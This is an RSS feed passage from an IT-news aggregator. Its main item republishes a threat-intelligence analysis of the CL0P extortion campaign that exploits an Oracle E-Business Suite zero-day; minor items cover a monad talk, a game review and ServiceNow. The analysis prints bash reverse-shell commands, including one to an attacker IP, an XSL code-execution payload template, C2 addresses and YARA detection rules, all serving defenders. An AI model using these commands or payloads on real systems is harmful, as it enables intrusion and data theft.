          The Undoable Monad provides an excellent example of monad: it is
          simple enough, yet solves a real problem in an elegant way. This talk
          is a fun and practical introduction to monadic programming.

Licensed to the public under https://creativecommons.org/licenses/by/3.0/de
about this event: https://bobkonf.de/2026/paul-elliot.html]]></content:encoded>
</item>
<item>
<title><![CDATA[The Adventures of Elliot: The Millennium Tales trades turn-based combat for real-time action]]></title>
<description><![CDATA[We played an hour of Square Enix’s latest HD-2D RPG that trades in turn-based combat for real-time action.]]></description>
<link>https://tsecurity.de/de/3526197/it-nachrichten/the-adventures-of-elliot-the-millennium-tales-trades-turn-based-combat-for-real-time-action/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3526197/it-nachrichten/the-adventures-of-elliot-the-millennium-tales-trades-turn-based-combat-for-real-time-action/</guid>
<pubDate>Mon, 18 May 2026 16:02:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[We played an hour of Square Enix’s latest HD-2D RPG that trades in turn-based combat for real-time action.]]></content:encoded>
</item>
<item>
<title><![CDATA[Oracle E-Business Suite Zero-Day Exploited in Widespread Extortion Campaign]]></title>
<description><![CDATA[Written by: Peter Ukhanov, Genevieve Stark, Zander Work, Ashley Pearson, Josh Murchie, Austin Larsen

Update (Oct. 11): On Oct. 11, Oracle released another patch, addressing CVE-2025-61884.
Introduction
Beginning Sept. 29, 2025, Google Threat Intelligence Group (GTIG) and Mandiant began tracking ...]]></description>
<link>https://tsecurity.de/de/3504167/it-security-nachrichten/oracle-e-business-suite-zero-day-exploited-in-widespread-extortion-campaign/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3504167/it-security-nachrichten/oracle-e-business-suite-zero-day-exploited-in-widespread-extortion-campaign/</guid>
<pubDate>Sun, 10 May 2026 08:09:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Peter Ukhanov, Genevieve Stark, Zander Work, Ashley Pearson, Josh Murchie, Austin Larsen</p>
<hr></div>
<div class="block-paragraph_advanced"><p><em><span><span><span><span>Update (Oct. 11): On Oct. 11, Oracle released </span><a href="https://www.oracle.com/security-alerts/alert-cve-2025-61884.html" rel="noopener" target="_blank"><span>another patch</span></a><span>, addressing CVE-2025-61884.</span></span></span></span></em></p>
<h3><span>Introduction</span></h3>
<p><span>Beginning Sept. 29, 2025, Google Threat Intelligence Group (GTIG) and Mandiant began tracking a new, large-scale extortion campaign by a threat actor claiming affiliation with the CL0P extortion brand. The actor began sending a high volume of emails to executives at numerous organizations, alleging the theft of sensitive data from the victims' Oracle E-Business Suite (EBS) environments. On Oct. 2, 2025, </span><a href="https://blogs.oracle.com/security/post/apply-july-2025-cpu" rel="noopener" target="_blank"><span>Oracle reported</span></a><span> that the threat actors may have exploited vulnerabilities that were patched in July 2025 and recommended that customers apply the latest critical patch updates</span><span>. <span>On Oct. 4, 2025, Oracle directed customers to apply </span><a href="https://www.oracle.com/security-alerts/alert-cve-2025-61882.html" rel="noopener" target="_blank"><span>emergency patches</span></a><span> to address this vulnerability, reiterating their standing recommendation that customers stay current on all Critical Patch Updates.</span></span></p>
<p><span>Our analysis indicates that the CL0P extortion campaign followed months of intrusion activity targeting EBS customer environments. The threat actor(s) exploited what may be </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-61882" rel="noopener" target="_blank"><span>CVE-2025-61882</span></a><span> as a zero-day vulnerability against Oracle EBS customers as early as Aug. 9, 2025, weeks before a patch was available, with additional suspicious activity dating back to July 10, 2025. In some cases, the threat actor successfully exfiltrated a significant amount of data from impacted organizations.</span></p>
<p><span>This post provides an in-depth analysis of the campaign, deconstructs the multi-stage Java implant framework used by the threat actors to compromise Oracle EBS, details the earlier exploitation activity, and provides actionable guidance and indicators of compromise (IOCs) for defenders.</span></p>
<h3><span>Background</span></h3>
<p><span>The CL0P (aka CL0P^_- LEAKS) data leak site (DLS) was established in 2020. Initially, GTIG observed the DLS used for multifaceted extortion operations involving CL0P ransomware and attributed to </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/fin11-email-campaigns-precursor-for-ransomware-data-theft"><span>FIN11</span></a><span>. More recently, the majority of the alleged victims appear to be associated with data theft extortion incidents stemming from the mass exploitation of zero-day vulnerabilities in managed file transfer (MFT) systems, including the Accellion legacy file transfer appliance (FTA), GoAnywhere MFT, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/zero-day-moveit-data-theft"><span>MOVEit MFT</span></a><span>, and Cleo LexiCom. In most of these incidents, the threat actors conducted mass exploitation of zero-day (0-day) vulnerabilities, stole victim data, then initiated extortion attempts several weeks later. While this data theft extortion activity has most frequently been attributed to FIN11 and suspected FIN11 threat clusters, we have also observed evidence that CL0P ransomware and the CL0P DLS are used by at least one threat actor with different tactics, techniques, and procedures (TTPs). This could suggest that FIN11 has expanded their membership or partnerships over time.</span></p>
<p><span>This latest campaign targeting Oracle EBS marks a continuation of this successful and high-impact operational model.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/oracle-cl0p-fig1.max-1000x1000.png" alt="Oct 8 updated CL0P DLS site">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="ok79b">Figure 1: Oct. 8 updated CL0P DLS site</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Threat Detail </span></h3>
<h4><span>The CL0P Extortion Campaign</span></h4>
<p><span>Starting Sept. 29, 2025, the threat actor launched a high-volume email campaign from hundreds, if not thousands, of compromised third-party accounts. The credentials for these accounts—which belong to diverse, unrelated organizations—were likely sourced from infostealer malware logs sold on underground forums. This is a common tactic used by threat actors to add legitimacy and bypass spam filters. The emails, sent to company executives, claimed the actor had breached their Oracle EBS application and exfiltrated documents. </span></p>
<p><span>Notably, the emails contain two contact addresses, </span><code>support@pubstorm.com</code><span> and </span><code>support@pubstorm.net</code><span>, that have been listed on the CL0P DLS since at least May 2025. To substantiate their claims, the threat actor has provided legitimate file listings from victim EBS environments to multiple organizations with data dating back to mid-August 2025. The extortion emails have indicated that alleged victims can prevent the release of stolen data in exchange for payment, but the amount and method has not been specified. This is typical of most modern extortion operations, in which the demand is typically provided after the victim contacts the threat actors and indicates that they are authorized to negotiate.</span></p>
<p><span>To date, GTIG has not observed victims from this campaign on the CL0P DLS. This is consistent with past campaigns involving the CL0P brand, where actors have typically waited several weeks before posting victim data.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/oracle-cl0p-fig2.max-1000x1000.png" alt="Extortion email sent to victim executives">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="ok79b">Figure 2: Extortion email sent to victim executives</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>Technical Analysis: Deconstructing the Exploits</span></h4>
<p><span>We have identified exploitation activity targeting Oracle E-Business Suite (EBS) servers occurring prior to the recent extortion campaign, likely dating back to July 2025.</span></p>
<p><span>Oracle released a patch on Oct. 4 for CVE-2025-61882, which referenced a leaked exploit chain targeting the </span><code>UiServlet</code><span> component, but Mandiant has observed multiple different exploit chains involving Oracle EBS and it is likely that a different chain was the basis for the Oct. 2 advisory that originally suggested a known vulnerability was being exploited. It's currently unclear which specific vulnerabilities/exploit chains correspond to CVE-2025-61882, however, GTIG assesses that Oracle EBS servers updated through the patch released on Oct. 11 are likely no longer vulnerable to known exploitation chains.</span></p>
<h5><span>July 2025 Activity: Suspicious Activity Involving 'UiServlet'</span></h5>
<p><span>Mandiant incident responders identified activity in July 2025 targeting Oracle EBS servers where application logs suggested exploitation targeting </span><code>/OA_HTML/configurator/UiServlet</code><span>. The artifacts recovered in Mandiant's investigations do have some overlap with an exploit leaked in a Telegram group named “SCATTERED LAPSUS$ HUNTERS” on October 3rd, 2025. However, GTIG lacks sufficient evidence to directly correlate activity observed in July 2025 with use of this exploit. At this time, GTIG does not assess that actors associated with UNC6240 (aka "Shiny Hunters") were involved in this exploitation activity. </span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>The leaked exploit, as analyzed by </span><a href="https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/" rel="noopener" target="_blank"><span>watchTowr Labs</span></a><span>, combines several distinct primitives including Server-Side Request Forgery (SSRF), Carriage-Return Line-Feed (CRLF) injection, authentication bypass, and XSL template injection, to gain remote code execution on the target Oracle EBS server. As mentioned, it's not clear which CVE corresponds to any of the vulnerabilities exploited in this chain. Any commands executed following exploitation would use </span><code>sh</code><span> on Linux, or </span><code>cmd.exe</code><span> on Windows.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>The leaked exploit archive included sample invocations showing its use for executing a Bash reverse shell, with a command structured like </span><code>bash -i &gt;&amp; /dev/tcp/&lt;ip&gt;/&lt;port&gt; 0&gt;&amp;1</code><span>.</span></p>
</li>
</ul>
<h5><span>Activity Observed Before July 2025 Patch Release</span></h5>
<p><span>On July 10th, prior to the release of the July 2025 Oracle EBS security updates, Mandiant identified suspicious HTTP traffic from </span><code>200.107.207.26</code><span>. GTIG was unable to confirm the exact nature of this activity, but it's plausible that this was an early attempt at exploitation of Oracle EBS servers. However, there was no available forensic evidence showing outbound HTTP traffic consistent with the remote XSL payload retrieval performed in the leaked exploit, nor any suspicious commands observed being executed, inhibiting us from assessing that this was an actual exploitation attempt.</span></p>
<p><span>Additionally, Internet scan data showed that server exposing a Python AIOHTTP server at approximately the same time as the aforementioned activity, which is consistent with use of the callback server in the publicly leaked exploit.</span></p>
<h5><span>Activity Observed After July 2025 Patch Release</span></h5>
<p><span>After the patches were released, Mandiant observed likely exploitation attempts from </span><code>161.97.99.49</code><span> against Oracle EBS servers, with HTTP requests for </span><code>/OA_HTML/configurator/UiServlet</code><span> recorded. Notably, various logs involving EBS indicate that some of these requests timed out, suggesting the SSRF vulnerability present in the leaked public exploit, or follow-on activity that would've cleanly closed the request, may have failed. These errors were not observed in the activity recorded prior to the July 2025 patch release.</span></p>
<p><span>GTIG is not currently able to confirm if both of these sets of activity were conducted by the same threat actor or not.</span></p>
<h5><span>August 2025 Activity: Exploit Chain Targeting 'SyncServlet'</span></h5>
<p><span>In August 2025, a threat actor began exploiting a vulnerability in the </span><code>SyncServlet</code><span> component, allowing for unauthenticated remote code execution. This activity originated from multiple threat actor servers, including </span><code>200.107.207.26</code><span>, as observed in the aforementioned activity.</span></p>
<ul>
<li><strong>Exploit Flow</strong><span>: The attack is initiated with a </span><code>POST</code><span> request to </span><code>/OA_HTML/SyncServlet</code><span>. The actor then uses the XDO Template Manager functionality to create a new, malicious template within the EBS database. The final stage of the exploit is a request that triggers the payload via the Template Preview functionality. A request to the following endpoint is a high-fidelity indicator of compromise:</span></li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>/OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG&amp;TemplateCode=&lt;TMP|DEF&gt;&lt;16_RANDOM_HEX_STRING&gt;&amp;TemplateType=&lt;XSL-TEXT|XML&gt;…</code></pre></div>
<div class="block-paragraph_advanced"><p><span>The malicious payload is stored as a new template in the </span><code>XDO_TEMPLATES_B</code><span> database table. The template name (</span><code>TemplateCode</code><span>) consistently begins with the prefix </span><code>TMP</code><span> or </span><code>DEF</code><span>, and the </span><code>TemplateType</code><span> is set to </span><code>XSL-TEXT</code><span> or </span><code>XML</code><span>, respectively. The following is an example of a payload stored in database with the Base64 payload redacted:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>&lt;?xml version="1.0" encoding="UTF-8"?&gt;
    &lt;xsl:stylesheet version="1.0"
                    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                    xmlns:b64="http://www.oracle.com/XSL/Transform/java/sun.misc.BASE64Decoder"
                    xmlns:jsm="http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngineManager"
                    xmlns:eng="http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngine"
                    xmlns:str="http://www.oracle.com/XSL/Transform/java/java.lang.String"&gt;
        &lt;xsl:template match="/"&gt;
            &lt;xsl:variable name="bs" select="b64:decodeBuffer(b64:new(),'&lt;BASE64STRING&gt;')"/&gt;
            &lt;xsl:variable name="js" select="str:new($bs)"/&gt;
            &lt;xsl:variable name="m" select="jsm:new()"/&gt;
            &lt;xsl:variable name="e" select="jsm:getEngineByName($m, 'js')"/&gt;
            &lt;xsl:variable name="code" select="eng:eval($e, $js)"/&gt;
            &lt;xsl:value-of select="$code"/&gt;
        &lt;/xsl:template&gt;
    &lt;/xsl:stylesheet&gt;</code></pre></div>
<div class="block-paragraph_advanced"><p><span>Notably, the structure of this XSL payload is identical to the XSL payload in the leaked Oracle EBS exploit previously discussed.</span></p>
<p><span>GTIG has identified at least two different chains of Java payloads embedded in the XSL payloads, some of which has also been discussed </span><a href="https://blog.dingusxmcgee.com/blog/2025/10/06/Its-Java-All-The-Way-Down.html" rel="noopener" target="_blank"><span>here</span></a><span>:</span></p>
<ul>
<li role="presentation"><strong>GOLDVEIN.JAVA - Downloader</strong><span>: A Java variant of GOLDVEIN, a downloader that makes a request back to an attacker-controlled command-and-control (C2 or C&amp;C) IP address to retrieve and execute a second-stage payload. This beacon is disguised as a "TLSv3.1" handshake and contains logging functionality that returns the execution result to the actor in the HTTP response, within an HTML comment. Mandiant hasn't recovered any follow-on payloads downloaded by GOLDVEIN.JAVA at this time.</span>
<ul>
<li role="presentation"><span>GOLDVEIN was originally written in PowerShell and was first observed in the exploitation campaign of multiple Cleo software products in December 2024 by a suspected FIN11 threat cluster tracked as UNC5936.</span></li>
</ul>
</li>
<li role="presentation"><strong>SAGE* Infection Chain</strong><span>: A nested chain of multiple Java payloads resulting in a persistent filter that monitors for requests to endpoints containing </span><code>/help/state/content/destination./navId.1/navvSetId.iHelp/</code><span> to deploy additional Java payloads.</span>
<ul>
<li role="presentation"><span>The XSL payload contains a Base64-encoded </span><strong>SAGEGIFT</strong><span> payload. SAGEGIFT is a custom Java reflective class loader, written for Oracle WebLogic servers.</span></li>
<li role="presentation"><span>SAGEGIFT is used to load </span><strong>SAGELEAF</strong><span>, an in-memory dropper based on </span><a href="https://github.com/ReaJason/MemShellParty/blob/0c041ee1a97b1af1d677f2d2bc47f325d278da3e/generator/src/main/java/com/reajason/javaweb/memshell/injector/weblogic/WebLogicFilterInjector.java" rel="noopener" target="_blank"><span>public code</span></a><span> for reflectively loading Oracle WebLogic servlet filters, with additional logging code embedded in it. Logs in SAGELEAF are retrieved by the parent SAGEGIFT payload that loaded it, and they can be returned to the actor in the HTTP response within an HTML comment (structured the same way as GOLDVEIN.JAVA).</span></li>
<li role="presentation"><span>SAGELEAF is used to install </span><strong>SAGEWAVE</strong><span>, a malicious Java servlet filter that allows the actor to deploy an AES-encrypted ZIP archive with Java classes in it. Based on our analysis, there is a main payload of SAGEWAVE that may be similar to the </span><code>Cli</code><span> module of GOLDTOMB; however, at this time we have not directly observed this final stage.</span></li>
<li role="presentation"><span><span>Mandiant has observed variants of SAGEWAVE where the HTTP header </span><code>X-ORACLE-DMS-ECID</code><span> must be set to a specific, hardcoded value for the request payload to be processed, and has also seen different HTTP paths used for request filtering, including </span><code>/support/state/content/destination./navId.1/navvSetId.iHelp/</code>.</span></li>
</ul>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/oracle-cl0p-fig3.max-1000x1000.png" alt="SAGE* infection chain/trigger diagram">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="3ez9k">Figure 3: SAGE* infection chain/trigger diagram</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>Following successful exploitation, the threat actor has been observed executing reconnaissance commands from the EBS account "</span><strong>applmgr</strong><span>." These commands include:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>cat /etc/fstab
cat /etc/hosts
df -h
ip addr
cat /proc/net/arp

/bin/bash -i &gt;&amp; /dev/tcp/200.107.207.26/53 0&gt;&amp;1
arp -a
ifconfig
netstat -an
ping 8.8.8.8 -c 2
ps -aux</code></pre></div>
<div class="block-paragraph_advanced"><p><span>Furthermore, Mandiant observed the threat actor launching additional bash processes from Java (EBS process running a GOLDVEIN.JAVA second-stage payload) using </span><code>bash -i</code><span> and then executing various commands from the newly launched bash process. Child processes of any </span><code>bash -i</code><span> process launched by Java running as the EBS account “</span><strong>applmgr</strong><span>” should be reviewed as part of hunting for threat actor commands.</span></p>
<h3><span>Attribution: Overlaps with Confirmed and Suspected FIN11 Activity</span></h3>
<p><span>GTIG has not formally attributed this activity to a tracked threat group at this time. The use of the CL0P extortion brand, including contact addresses (support@pubstorm.com and support@pubstorm.net) that have been listed on the CL0P DLS since at least May 2025, is however notable. GTIG initially observed the DLS used for multifaceted extortion operations involving CL0P ransomware and attributed to FIN11. More recently, the majority of the alleged victims appear to be associated with data theft extortion incidents stemming from the exploitation of managed file transfer (MFT) systems frequently attributed to FIN11 and suspected FIN11 threat clusters. However, we have also observed evidence that CL0P ransomware, and the CL0P DLS has not been exclusively used by FIN11, precluding our ability to attribute based only on this factor. </span></p>
<p><span>In addition to the CL0P overlap, the post-exploitation tooling shows logical similarities to malware previously used in a suspected FIN11 campaign. Specifically, the use of the in-memory Java-based loader GOLDVEIN.JAVA that fetches a second-stage payload is reminiscent of the GOLDVEIN downloader and GOLDTOMB backdoor, which were deployed by the suspected FIN11 cluster UNC5936 during the mass exploitation of the Cleo MFT vulnerability in late 2024. Further, one of the compromised accounts used to send the recent extortion emails was previously used by FIN11. Ongoing analysis may reveal more details about the relationship between this recent activity and other threat clusters—such as FIN11 and UNC5936.</span></p>
<h3><span>Implications</span></h3>
<p><span>The pattern of exploiting a zero-day vulnerability in a widely used enterprise application, followed by a large-scale, branded extortion campaign weeks later, is a hallmark of activity historically attributed to FIN11 that has strategic benefits which may also appeal to other threat actors. Targeting public-facing applications and appliances that store sensitive data likely increases the efficiency of data theft operations, given that the threat actors do not need to dedicate time and resources to lateral movement. This overall approach—in which threat actors have leveraged zero-day vulnerabilities, limited their network footprint, and delayed extortion notifications—almost certainly increases the overall impact, given that threat actors may be able to exfiltrate data from numerous organizations without alerting defenders to their presence. CL0P-affiliated actors almost certainly perceive these mass exploitation campaigns as successful, given that they've employed this approach since at least late 2020. We therefore anticipate that they will continue to dedicate resources to acquiring zero-day exploits for similar applications for at least the near-term. </span></p>
<h3><span>Recommendations</span><strong> </strong></h3>
<p><span>GTIG and Mandiant recommend the following actions to mitigate and detect the threats posed by this activity and harden Oracle E-Business Suite environments:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Apply emergency patches immediately</strong><span>: Prioritize the application of the Oracle EBS patches released on Oct. 4, 2025, which mitigate the described exploitation activity (CVE-2025-61882). Given the active, in-the-wild exploitation, this is the most critical step to prevent initial access.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Hunt for malicious templates in the database</strong><span>: The threat actor(s) store payloads directly in the EBS database. Administrators should immediately query the </span><code>XDO_TEMPLATES_B</code><span> and </span><code>XDO_LOBS</code><span> tables to identify malicious templates. Review any templates where the </span><code>TEMPLATE_CODE</code><span> begins with </span><code>TMP</code><span> or </span><code>DEF</code><span>. The payload is stored in the </span><code>LOB_CODE</code><span> column.</span></p>
</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>SELECT * FROM XDO_TEMPLATES_B ORDER BY CREATION_DATE DESC;
SELECT * FROM XDO_LOBS ORDER BY CREATION_DATE DESC;</code></pre></div>
<div class="block-paragraph_advanced"><ul>
<li aria-level="1">
<p role="presentation"><strong>Restrict outbound internet access</strong><span>: The observed Java payloads require outbound connections to C2 servers to fetch second-stage implants or exfiltrate data. Block all non-essential outbound traffic from EBS servers to the internet. This is a compensating control that can disrupt the attack chain even if a server is compromised.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Monitor and analyze network logs</strong><span>: Monitor for indicators of compromise. A request to the </span><code>TemplatePreviewPG</code><span> endpoint containing a </span><code>TemplateCode</code><span> prefixed with </span><code>TMP</code><span> or </span><code>DEF</code><span> is a strong indicator of an exploitation attempt. Additionally, investigate anomalous requests to </span><code>/OA_HTML/configurator/UiServlet</code><span> and </span><code>/OA_HTML/SyncServlet</code><span>.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Leverage memory forensics</strong><span>: The implants used in this campaign are primarily Java-based and execute in memory. If a compromise is suspected, memory analysis of the Java processes associated with the EBS application may reveal malicious code or artifacts not present on disk.</span></p>
</li>
</ul>
<h3>Acknowledgments </h3>
<p>This analysis would not have been possible without the assistance from across Google Threat Intelligence Group and Mandiant Consulting. We would also like to specifically thank Genwei Jiang and Elliot Chernofsky from FLARE. </p>
<h3><span>Indicators of Compromise</span></h3>
<p><span>The <a href="https://www.virustotal.com/gui/collection/eee0f14fb778dd14962aedf6c10b499efcc6a98ee38b6da3b173270156d6d9f4" rel="noopener" target="_blank">following indicators of compromise are available</a> in a Google Threat Intelligence (GTI) collection for registered users.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Type</strong></p>
</td>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><strong>Network</strong></p>
</td>
<td>
<p><span>200.107.207.26</span></p>
</td>
<td>
<p><span>IP address observed in exploitation attempts targeting the </span><span>UiServlet</span><span> and </span><span>SyncServlet</span><span> components.</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Network</strong></p>
</td>
<td>
<p><span>161.97.99.49</span></p>
</td>
<td>
<p><span>IP address observed in exploitation attempts targeting the </span><span>UiServlet</span><span> component</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Network</strong></p>
</td>
<td>
<p><span>162.55.17.215:443</span></p>
</td>
<td>
<p><span>GOLDVEIN.JAVA C2</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Network</strong></p>
</td>
<td>
<p><span>104.194.11.200:443</span></p>
</td>
<td>
<p><span>GOLDVEIN.JAVA C2</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Network</strong></p>
</td>
<td>
<p><span>/OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG...</span></p>
</td>
<td>
<p><span>Indicator of an attempt to trigger the malicious XSL payload. Look for requests where </span><span>TemplateCode</span><span> begins with </span><span>TMP</span><span> or </span><span>DEF</span><span>.</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Network</strong></p>
</td>
<td>
<p><span>/OA_HTML/configurator/UiServlet</span></p>
</td>
<td>
<p><span>Endpoint targeted in the July 2025 exploitation activity.</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Network</strong></p>
</td>
<td>
<p><span>/OA_HTML/SyncServlet</span></p>
</td>
<td>
<p><span>Endpoint targeted in the August 2025 exploitation activity.</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Network</strong></p>
</td>
<td>
<p><span>/help/state/content/destination./navId.1/navvSetId.iHelp/</span></p>
</td>
<td>
<p><span>HTTP path substring filtered for by SAGEWAVE</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Network</strong></p>
</td>
<td>
<p><span>/support/state/content/destination./navId.1/navvSetId.iHelp/</span></p>
</td>
<td>
<p><span>HTTP path substring filtered for by SAGEWAVE</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Email</strong></p>
</td>
<td>
<p><span>support@pubstorm.com</span></p>
</td>
<td>
<p><span>Contact address used in the CL0P extortion emails and listed on the group's data leak site.</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Email</strong></p>
</td>
<td>
<p><span>support@pubstorm.net</span></p>
</td>
<td>
<p><span>Contact address used in the CL0P extortion emails and listed on the group's data leak site.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3>YARA Rules</h3></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Downloader_GOLDVEIN_JAVA_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$chunk1 = "175,121,73" base64
		$chunk2 = "249,254,255" base64
		$chunk3 = "235,176,29" base64
		$chunk4 = "242,61,32" base64
		$chunk5 = "189,66,134" base64
		$str1 = "java.net.Socket(h,443)" base64
		$str2 = "TLSv3.1" base64
		$decoded1 = "[175,121,73,249,254,255,235,176,29,242,61,32,189,66,134,102,56,208,18,10,132,242,223,202,90,97,118,3,83,136,84,213]"
		$decoded2 = "java.net.Socket(h,443)"
		$decoded3 = "TLSv3.1"
	condition:
		(3 of ($chunk*) and all of ($str*)) or all of ($decoded*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Dropper_SAGEGIFT_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$str1 = "ServletRequestImpl" base64
		$str2 = "getServletRequest" base64
		$str3 = "ServletResponseImpl" base64
		$str4 = "dc=cl.getDeclaredMethod('defineClass',[cb,ci,ci])" base64
		$decoded1 = "ServletRequestImpl"
		$decoded2 = "getServletRequest"
		$decoded3 = "ServletResponseImpl"
		$decoded4 = "dc=cl.getDeclaredMethod('defineClass',[cb,ci,ci])"
	condition:
		all of ($str*) or all of ($decoded*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Dropper_SAGELEAF_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$log1 = "n1=%d n2=%d"
		$log2 = "ctx.l=%d"
		$log3 = "Filter=" fullword
		$pat = "/help/*"
		$s1 = "weblogic.t3.srvr.ServerRuntime"
		$s2 = "gzipDecompress"
		$s3 = "BASE64Decoder"
		$s4 = "getDeclaredMethod"
	condition:
		2 of ($log*) and 5 of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Launcher_SAGEWAVE_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "Log4jConfigQpgsubFilter"
		$s2 = ".Cli" fullword
		$s3 = "httpReq" fullword
		$s4 = "AES/CBC/NoPadding"
		$s5 = "javax/servlet/FilterChain"
		$s6 = "java/lang/reflect/Method"
	condition:
		4 of ($s*) and filesize &lt; 1MB
}</code></pre></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ServiceNow continues its AI transformation with an integrated experience]]></title>
<description><![CDATA[ServiceNow has unveiled updates to its workflow management platform advancing its redefinition of itself as the “AI control tower for business reinvention” at its Knowledge customer event this week.



The AI Control Tower product itself, introduced at last year’s event, gets new integrations wit...]]></description>
<link>https://tsecurity.de/de/3493657/it-nachrichten/servicenow-continues-its-ai-transformation-with-an-integrated-experience/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3493657/it-nachrichten/servicenow-continues-its-ai-transformation-with-an-integrated-experience/</guid>
<pubDate>Wed, 06 May 2026 19:32:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>ServiceNow has unveiled updates to its workflow management platform advancing its redefinition of itself as the “AI control tower for business reinvention” at its Knowledge customer event this week.</p>



<p>The <a href="https://www.networkworld.com/article/3978731/servicenow-launches-ai-agent-command-center-communication-backbone.html" target="_blank">AI Control Tower</a> product itself, introduced at last year’s event, gets new integrations with Microsoft Azure, Amazon Web Services (AWS), Google Cloud Platform (GCP) and other LLM providers to extend governance and observability of enterprise infrastructure, adding to its existing links with <a href="https://www.cio.com/article/4119588/servicenow-deal-will-see-it-embed-openai-models-into-its-ai-platform.html" target="_blank">OpenAI</a> and <a href="https://www.cio.com/article/4124222/servicenow-embeds-anthropic-claude-as-its-default-build-agent-model.html" target="_blank">Anthropic</a>. The integrations also span applications such as SAP, Oracle, and Workday. In addition, Control Tower can now discover non-human identities and connected devices to bring OT and IoT under the same governance as AI agents and cloud services.</p>



<p>All this ties in to the ServiceNow Action Fabric, which opens the platform to any AI agent, whether built on ServiceNow or from another source, via a Model Context Protocol (MCP) server, the company said.</p>



